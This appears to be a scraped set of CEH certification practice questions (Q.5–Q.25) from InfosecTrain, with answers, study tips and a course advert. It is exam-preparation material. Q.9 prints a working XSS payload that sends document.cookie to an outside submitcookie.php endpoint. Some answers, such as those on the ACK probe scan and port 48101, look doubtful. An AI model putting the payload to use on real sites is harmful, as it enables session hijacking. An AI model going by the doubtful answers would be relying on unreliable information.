  • 7. www.infosectrain.com 03 Q.5. Which of the following methods is most effective for detecting and stopping ransomware attacks? Antivirus software Regular data backups and endpoint detection Disabling macros in Microsoft Of๏ฌce Changing user passwords frequently Answer: B. Regular data backups and endpoint detection Explanation: Ransomware protection relies on secure backups and real-time endpoint detection to mitigate the impact of an attack. Answer: B. Regular data backups and endpoint detection Explanation: Ransomware protection relies on secure backups and real-time endpoint detection to mitigate the impact of an attack. STUDY TIP "Backup, Detect, Protect"โ€”Regular backups and ransomware-speci๏ฌc defenses can prevent costly data loss.
  • 8. www.infosectrain.com 08 Q.6. Jane, an Ethical Hacker, is testing an organizationโ€™s web server and website for security vulnerabilities. She copied the entire website onto her local drive to analyze its directory structure, ๏ฌle structure, external links, images, and web pages. This information helps her map the websiteโ€™s directories and gather valuable insights. What attack technique did Jane use? Web cache poisoning Session hijacking Website mirroring Website defacement Directory traversal Answer: C. Website mirroring Explanation: Website mirroring is the process of copying an entire website, including its content, structure, and resources, for analysis. Ethical Hackers use this technique to identify security ๏ฌ‚aws in web applications, while malicious actors may use it for phishing attacks or reconnaissance. Answer: C. Website mirroring Explanation: Website mirroring is the process of copying an entire website, including its content, structure, and resources, for analysis. Ethical Hackers use this technique to identify security ๏ฌ‚aws in web applications, while malicious actors may use it for phishing attacks or reconnaissance. Web cache poisoning: Injects malicious content into cached responses. Session hijacking: Steals session cookies to impersonate users. Website mirroring: Clones a site for analysis or phishing. Website defacement: Modi๏ฌes a websiteโ€™s content maliciously. Directory traversal: Accesses restricted directories on a web server. STUDY TIP
  • 9. www.infosectrain.com 09 Q.7. Clark, a professional hacker, created and con๏ฌgured multiple domains pointing to the same host, allowing him to switch quickly between domains to evade detection. What adversary behavior does this represent? Unspeci๏ฌed proxy activities Use of command-line interface Data staging Use of DNS tunneling Fast ๏ฌ‚ux technique Answer: E. Fast ๏ฌ‚ux technique Explanation: Fast ๏ฌ‚ux is a technique where attackers rapidly change IP addresses and domain associations to evade detection. By using multiple domains pointing to the same host, attackers make it dif๏ฌcult for security systems to block their malicious infrastructure. This technique is commonly used in botnets, phishing, and malware distribution. Answer: E. Fast ๏ฌ‚ux technique Explanation: Fast ๏ฌ‚ux is a technique where attackers rapidly change IP addresses and domain associations to evade detection. By using multiple domains pointing to the same host, attackers make it dif๏ฌcult for security systems to block their malicious infrastructure. This technique is commonly used in botnets, phishing, and malware distribution. Unspeci๏ฌed proxy activities: Uses proxy servers to mask identity. Use of command-line interface: Executes attacks via CLI tools. Data staging: Prepares data before ex๏ฌltrating it. Use of DNS tunneling: Hides malicious traf๏ฌc within DNS queries. Fast ๏ฌ‚ux technique: Rapidly switches domains/IPs to evade detection. STUDY TIP
  • 10. www.infosectrain.com 10 Q.8. Sam, a Penetration Tester at InfosecTrain, was assigned to perform port scanning on a target host. He sent FIN/ACK probes, and the target host responded with an RST packet, indicating that the port is closed. Which port scanning technique did Sam use? IDLE/IPID header scan Xmas scan ACK ๏ฌ‚ag probe scan TCP Maimon scan FIN scan Answer: C. ACK ๏ฌ‚ag probe scan Explanation: The ACK ๏ฌ‚ag probe scan is used to determine the state of ๏ฌrewall rules and identify whether ports are ๏ฌltered or un๏ฌltered. When an ACK probe is sent: If an RST packet is received, the port is un๏ฌltered (closed). If no response or an ICMP unreachable message is received, the port is ๏ฌltered (likely blocked by a ๏ฌrewall). Answer: C. ACK ๏ฌ‚ag probe scan Explanation: The ACK ๏ฌ‚ag probe scan is used to determine the state of ๏ฌrewall rules and identify whether ports are ๏ฌltered or un๏ฌltered. When an ACK probe is sent: If an RST packet is received, the port is un๏ฌltered (closed). If no response or an ICMP unreachable message is received, the port is ๏ฌltered (likely blocked by a ๏ฌrewall). IDLE/IPID header scan: Uses a โ€œzombieโ€ host to perform stealth scanning. Xmas scan: Sends FIN, PSH, and URG ๏ฌ‚ags; works on UNIX-based systems. ACK ๏ฌ‚ag probe scan: Identi๏ฌes ๏ฌltered vs. un๏ฌltered ports. TCP Maimon scan: Similar to FIN scan, but bypasses some ๏ฌrewalls. FIN scan: Uses FIN ๏ฌ‚ag to check if ports are open on UNIX systems. STUDY TIP
  • 11. www.infosectrain.com 11 Q.9. Judy created a forum where users can post comments and images. One day, she noticed that a user was posting strange images without any comments. Concerned, she contacts a security expert, who discovers the following hidden code behind those images: <script> document.write('<img src="https://localhost/submitcookie.php?cookie=' + escape(document.cookie) + '" />'); </script> The code redirects the user to another site. The code injects a new cookie into the browser. The code is a virus that attempts to gather the userโ€™s username and password. The PHP ๏ฌle silently executes the code and grabs the userโ€™s session cookie and session ID. The code modi๏ฌes the forum database to create a backdoor. Answer: D. The PHP ๏ฌle silently executes the code and grabs the userโ€™s session cookie and session ID. Explanation: The code is an example of Cross-Site Scripting (XSS). It steals the userโ€™s session cookies by sending them to an attacker's server (submitcookie.php). With a stolen session cookie, an attacker can hijack the userโ€™s session, gaining unauthorized access to their account. Answer: D. The PHP ๏ฌle silently executes the code and grabs the userโ€™s session cookie and session ID. Explanation: The code is an example of Cross-Site Scripting (XSS). It steals the userโ€™s session cookies by sending them to an attacker's server (submitcookie.php). With a stolen session cookie, an attacker can hijack the userโ€™s session, gaining unauthorized access to their account.
  • 12. www.infosectrain.com 12 XSS Attack: Injects malicious scripts into web pages. Session Hijacking: Steals session cookies for unauthorized access. Mitigation: Use HTTPOnly and Secure cookie attributes, input validation, and Content Security Policy (CSP). Stored XSS: Malicious code is permanently stored on the site. Re๏ฌ‚ected XSS: Malicious code is executed only when a user clicks a crafted link. STUDY TIP Q.10. A hacker sends a malicious script disguised as an image ๏ฌle to a victim. When the victim opens the ๏ฌle, their browser executes the script, stealing their session tokens. What type of attack is this? SQL injection Cross-site Scripting (XSS) Command injection XML External Entity (XXE) attack Answer: B. Cross-site Scripting (XSS) Explanation: XSS attacks inject malicious scripts into web pages that execute in the victimโ€™s browser, allowing attackers to steal session cookies and sensitive data. Answer: B. Cross-site Scripting (XSS) Explanation: XSS attacks inject malicious scripts into web pages that execute in the victimโ€™s browser, allowing attackers to steal session cookies and sensitive data. "Never Trust User Input"โ€”Always validate, sanitize, and encode user input to prevent XSS attacks! STUDY TIP
  • 13. www.infosectrain.com 13 Q.11. Which type of wireless attack involves capturing authentication handshakes to crack Wi-Fi passwords? Rogue access point attack Evil twin attack WPA2 handshake capture attack Bluetooth snif๏ฌng Answer: C. WPA2 handshake capture attack Explanation: Attackers capture WPA2 handshake packets using tools like Aircrack-ng and attempt to crack the Wi-Fi password through brute force. Answer: C. WPA2 handshake capture attack Explanation: Attackers capture WPA2 handshake packets using tools like Aircrack-ng and attempt to crack the Wi-Fi password through brute force. STUDY TIP "Strong Passwords Win"โ€”Use long, complex Wi-Fi passwords and enable WPA3 if possible!
  • 14. www.infosectrain.com 14 Q.12. Susan, a Software Developer, wants her web API to update other applications with the latest information. She uses a user-de๏ฌned HTTP callback or push API that triggers events to supply data in real-time, allowing users to receive instant updates. What technique is she using? Answer: A. Webhooks Explanation: Webhooks are event-driven HTTP callbacks that automatically send data to other applications when a trigger event occurs. Unlike REST APIs that require polling, webhooks push real-time updates, improving ef๏ฌciency and reducing server load. Answer: A. Webhooks Explanation: Webhooks are event-driven HTTP callbacks that automatically send data to other applications when a trigger event occurs. Unlike REST APIs that require polling, webhooks push real-time updates, improving ef๏ฌciency and reducing server load. Webhooks REST API SOAP API Web shells Server-Sent Events (SSE) Webhooks: Push-based, triggered by events. REST API: Pull-based, requires periodic requests. SOAP API: Uses XML, a more complex and strict structure. Web shells: Malicious scripts used for remote control. Server-Sent Events (SSE): One-way connection from server to client. STUDY TIP
  • 15. www.infosectrain.com 15 Q.13. A Red Team Tester wants to remain undetected while scanning an internal network. Which Nmap option should they use? -T5 -A -sS -sT Answer: C. -sS Explanation: The SYN scan (-sS) is stealthier than a full TCP connect scan because it does not complete the three-way handshake, making it harder for IDS/IPS systems to detect. Answer: C. -sS Explanation: The SYN scan (-sS) is stealthier than a full TCP connect scan because it does not complete the three-way handshake, making it harder for IDS/IPS systems to detect. -T5: Too fast, easily detected. Trick: "Turbo = Trouble." -A: Aggressive mode, loud scan. Trick: "A for Alert." -sS: Stealthy, avoids full handshake. Trick: "Silent SYN." -sT: Full handshake, easily logged. Trick: "T for Tracked. STUDY TIP "Stealth is Key"โ€”Use SYN scans for quiet reconnaissance and avoid detection.
  • 16. www.infosectrain.com 16 Q.14. During the enumeration phase, Lawrence performs banner grabbing to gather information such as OS details and service versions. He targets a service running on TCP port 445. Which service did Lawrence enumerate? Answer: D. Server Message Block (SMB) Explanation: Server Message Block (SMB) operates on TCP port 445 and is used for ๏ฌle sharing, printer access, and network communication in Windows environments. Attackers often enumerate SMBs to extract user accounts and shared resources as well as exploit vulnerabilities like EternalBlue. Answer: D. Server Message Block (SMB) Explanation: Server Message Block (SMB) operates on TCP port 445 and is used for ๏ฌle sharing, printer access, and network communication in Windows environments. Attackers often enumerate SMBs to extract user accounts and shared resources as well as exploit vulnerabilities like EternalBlue. Remote Procedure Call (RPC) Telnet Network File System (NFS) Server Message Block (SMB) Secure Shell (SSH) RPC (Remote Procedure Call): Runs on port 135, used for inter-process communication. Telnet: Runs on port 23 and provides remote command-line access. NFS (Network File System): Runs on port 2049, and allows ๏ฌle sharing in UNIX/Linux. SMB (Server Message Block): Runs on port 445, used for Windows ๏ฌle sharing. SSH (Secure Shell): Runs on port 22 and encrypts remote administration sessions. STUDY TIP
  • 17. www.infosectrain.com 17 Q.15. An attacker sets up a fake Wi-Fi hotspot with a name similar to a nearby legitimate network to trick users into connecting. What is this attack called? DNS Spoo๏ฌng Evil Twin Attack Rogue DHCP Attack SSID Flooding Answer: B. Evil Twin Attack Explanation: Evil Twin attacks involve setting up a rogue wireless access point that mimics a legitimate one, tricking users into connecting and exposing their credentials. Answer: B. Evil Twin Attack Explanation: Evil Twin attacks involve setting up a rogue wireless access point that mimics a legitimate one, tricking users into connecting and exposing their credentials. STUDY TIP "Always Verify Wi-Fi"โ€”Before connecting, verify the Wi-Fi network name and ask IT for con๏ฌrmation!
  • 18. www.infosectrain.com 18 Q.16. An attacker successfully installs a keylogger on a victim's machine to capture sensitive credentials. What type of attack is this? Spyware attack Phishing attack Rootkit attack Denial-of-Service (DoS) attack Answer: A. Spyware attack Explanation: Spyware is malicious software designed to secretly record user activity, such as keystrokes, and send it to attackers. Answer: A. Spyware attack Explanation: Spyware is malicious software designed to secretly record user activity, such as keystrokes, and send it to attackers. STUDY TIP "KEY = Keep Examining Your system"โ€”Run frequent malware scans and avoid unknown software!
  • 19. www.infosectrain.com 19 Q.17. What is the most effective way to mitigate a brute-force attack on a login portal? Increasing password complexity Implementing account lockout policies Encrypting all stored passwords Using a VPN Answer: B. Implementing account lockout policies Explanation: Account lockout policies help prevent brute-force attacks by locking accounts after a set number of failed login attempts. Answer: B. Implementing account lockout policies Explanation: Account lockout policies help prevent brute-force attacks by locking accounts after a set number of failed login attempts. STUDY TIP "BLOCK = Brute-force Lockout On Count"โ€”Set up MFA and lockout policies to prevent brute-force attacks!
  • 20. www.infosectrain.com 20 Q.18. Which Google advanced search operator helps an attacker ๏ฌnd websites similar to a speci๏ฌed target URL? Answer: B. related: Explanation: The related: operator helps ๏ฌnd websites similar to a speci๏ฌed domain. Attackers use it for competitive analysis, reconnaissance, and expanding target scope during OSINT (Open-Source Intelligence) gathering. Answer: B. related: Explanation: The related: operator helps ๏ฌnd websites similar to a speci๏ฌed domain. Attackers use it for competitive analysis, reconnaissance, and expanding target scope during OSINT (Open-Source Intelligence) gathering. site: related: info: inurl: cache: site: --> Searches within a speci๏ฌc domain (site:example.com). related: --> Finds similar websites (related:example.com). info: --> Displays cached pages and link details (info:example.com). inurl: --> Finds URLs containing speci๏ฌc keywords (inurl:admin). cache: --> Shows Googleโ€™s last cached version of a page (cache:example.com). STUDY TIP
  • 21. www.infosectrain.com 21 Q.19. An attacker installs a rootkit that remains undetected in the core components of the operating system, allowing them to maintain access to a machine invisibly. What type of rootkit is this? Answer: C. Kernel rootkit Explanation: A kernel rootkit operates at the operating systemโ€™s core (kernel level), making it extremely dif๏ฌcult to detect and remove. It intercepts system calls, hides processes, and provides persistent backdoor access while remaining invisible to antivirus software. Answer: C. Kernel rootkit Explanation: A kernel rootkit operates at the operating systemโ€™s core (kernel level), making it extremely dif๏ฌcult to detect and remove. It intercepts system calls, hides processes, and provides persistent backdoor access while remaining invisible to antivirus software. Firmware rootkit Hypervisor rootkit Kernel rootkit Hardware rootkit User-mode rootkit Firmware rootkit: Embedded in hardware ๏ฌrmware (BIOS, UEFI). Hypervisor rootkit: Runs beneath the OS, controlling it. Kernel rootkit: Hides in the OS kernel, most stealthy. Hardware rootkit: Resides in system hardware (chipsets). User-mode rootkit: Runs in user space, easier to detect. STUDY TIP
  • 22. www.infosectrain.com 22 Q.20. While performing a web application scan, you want to determine the web server version hosting the application. Using the -sV ๏ฌ‚ag with Nmap, you receive this response: 80/tcp open http-proxy Apache Server 7.1.6. What information-gathering technique does this describe? Answer: C. Banner grabbing Explanation: Banner grabbing is a technique used to gather information about a service by retrieving its version, operating system, and other metadata. The -sV ๏ฌ‚ag in Nmap is speci๏ฌcally used for service version detection, helping security professionals assess potential vulnerabilities. Answer: C. Banner grabbing Explanation: Banner grabbing is a technique used to gather information about a service by retrieving its version, operating system, and other metadata. The -sV ๏ฌ‚ag in Nmap is speci๏ฌcally used for service version detection, helping security professionals assess potential vulnerabilities. Dictionary attack Brute forcing Banner grabbing WHOIS lookup Passive reconnaissance Dictionary attack: Uses a pre-compiled list of passwords for cracking. Brute forcing: Tries all possible password combinations. Banner grabbing: Extracts server details from response headers. WHOIS lookup: Retrieves domain registration info. Passive reconnaissance: Collects data without direct interaction. STUDY TIP
  • 23. www.infosectrain.com 23 Q.21. John is investigating web application ๏ฌrewall logs and notices an attempt to inject the following code: char buff[10]; buff[10] = 'a'; What type of attack is this? Answer: C. Buffer over๏ฌ‚ow Explanation: A buffer over๏ฌ‚ow attack occurs when a program writes data beyond the allocated memory buffer. In this case, buff[10] = 'a'; attempts to write outside the bounds of the buffer, which can cause memory corruption, crashes, or remote code execution. Answer: C. Buffer over๏ฌ‚ow Explanation: A buffer over๏ฌ‚ow attack occurs when a program writes data beyond the allocated memory buffer. In this case, buff[10] = 'a'; attempts to write outside the bounds of the buffer, which can cause memory corruption, crashes, or remote code execution. SQL injection CSRF Buffer over๏ฌ‚ow XSS Directory traversal SQL Injection: Injects malicious SQL queries into a database. CSRF (Cross-Site Request Forgery): Tricks users into executing unwanted actions. Buffer Over๏ฌ‚ow: Overwrites memory, leading to crashes or exploits. XSS (Cross-Site Scripting): Injects malicious JavaScript into web pages. Directory Traversal: Gains unauthorized access to system ๏ฌles. STUDY TIP
  • 24. www.infosectrain.com 24 Q.22. Which common ๏ฌles on a web server, if miscon๏ฌgured, could expose useful information such as verbose error messages to hackers? Answer: B. php.ini Explanation: The php.ini ๏ฌle controls PHP settings, including error reporting and logging. If miscon๏ฌgured, it may expose verbose error messages, ๏ฌle paths, and database credentials, helping attackers exploit vulnerabilities. Answer: B. php.ini Explanation: The php.ini ๏ฌle controls PHP settings, including error reporting and logging. If miscon๏ฌgured, it may expose verbose error messages, ๏ฌle paths, and database credentials, helping attackers exploit vulnerabilities. administration.con๏ฌg php.ini httpd.conf idq.dll web.con๏ฌg administration.con๏ฌg: Not a common web server con๏ฌg ๏ฌle. php.ini: Manages PHP settings, crucial for security. httpd.conf: Con๏ฌgures Apache web server settings. idq.dll: Old IIS indexing service component. web.con๏ฌg: ASP.NET con๏ฌguration ๏ฌle, contains sensitive settings. STUDY TIP
  • 25. www.infosectrain.com 25 Q.23. If you suspect an IoT device has been compromised, which port should you block ๏ฌrst? Answer: A. 48101 Explanation: Port 48101 is commonly used by IoT devices for remote access and botnet communication. Attackers often target IoT devices for DDoS attacks, unauthorized control, and data theft. Blocking this port can limit attacker access. Answer: A. 48101 Explanation: Port 48101 is commonly used by IoT devices for remote access and botnet communication. Attackers often target IoT devices for DDoS attacks, unauthorized control, and data theft. Blocking this port can limit attacker access. 48101 443 80 22 23 Port 48101: Used by compromised IoT devices for C2 (Command & Control). Port 443 (HTTPS): Encrypts web traf๏ฌc, usually safe. Port 80 (HTTP): Handles unencrypted web traf๏ฌc. Port 22 (SSH): Used for remote access, often targeted. Port 23 (Telnet): Unsecured remote login, commonly exploited. STUDY TIP
  • 26. www.infosectrain.com 26 Q.24. Heatherโ€™s company is adopting a new cloud-hosted customer relationship management (CRM) tool. The provider will handle hardware, OS, software administration, patching, and monitoring, while Heatherโ€™s only task is user account management. What type of cloud solution is this? Answer: A. SaaS (Software as a Service) Explanation: SaaS is a fully managed cloud solution where users access applications over the internet without managing infrastructure, OS, or software updates. Examples include CRM tools (e.g., Salesforce), email services (e.g., Gmail), and collaboration platforms (e.g., Microsoft 365). Answer: A. SaaS (Software as a Service) Explanation: SaaS is a fully managed cloud solution where users access applications over the internet without managing infrastructure, OS, or software updates. Examples include CRM tools (e.g., Salesforce), email services (e.g., Gmail), and collaboration platforms (e.g., Microsoft 365). SaaS CaaS PaaS IaaS FaaS SaaS (Software as a Service): Fully managed software, just use it. CaaS (Container as a Service): Manages containers in the cloud. PaaS (Platform as a Service): Provides a development environment. IaaS (Infrastructure as a Service): Gives virtual machines & storage. FaaS (Function as a Service): Runs serverless functions on demand. STUDY TIP
  • 27. www.infosectrain.com 27 Q.25. During a penetration test, you gained access to a user account. You connected to your own machine via the SMB service and entered your login and password in plaintext. Which ๏ฌle must you clean to remove the password? Answer: A. .bash_history Explanation: The .bash_history ๏ฌle logs previously executed commands, including credentials entered in plaintext. Clearing or securely deleting this ๏ฌle prevents password recovery by an attacker or forensic investigator. Answer: A. .bash_history Explanation: The .bash_history ๏ฌle logs previously executed commands, including credentials entered in plaintext. Clearing or securely deleting this ๏ฌle prevents password recovery by an attacker or forensic investigator. .bash_history .xsession-log .bashrc .pro๏ฌle syslog .bash_history: Stores command history, including passwords. .xsession-log: Logs X session events, not commands. .bashrc: Con๏ฌgures bash shell settings, no history. .pro๏ฌle: Loads user environment variables, no history. syslog: Stores system logs, but not user commands. STUDY TIP
  • 28. www.infosectrain.com 28 Summary Mastering ethical hacking requires more than theoretical knowledgeโ€”it demands hands-on experience, real-world scenarios, and continuous learning. This guide covered top essential CEH questions, helping you understand key security concepts such as penetration testing, malware analysis, and cryptographic attacks. While self-study is valuable, a structured learning approach accelerates success. InfosecTrainโ€™s CEH Training Course provides: Ready to take the next step? Elevate your CEH preparation with InfosecTrainโ€™s CEH Training Course and become a Certi๏ฌed Ethical Hacker with con๏ฌdence! Enroll now! Visit www.InfosecTrain.com to learn more. Expert-Led Training: Learn from certi๏ฌed CEH professionals with industry experience. Hands-On Labs: Gain practical skills through real-world hacking scenarios. Exam-Focused Content: Covers the latest CEH v13 curriculum, including updated cyber threats and ethical hacking techniques. Flexible Learning Options: Choose from self-paced, instructor-led, or corporate training tailored to your schedule.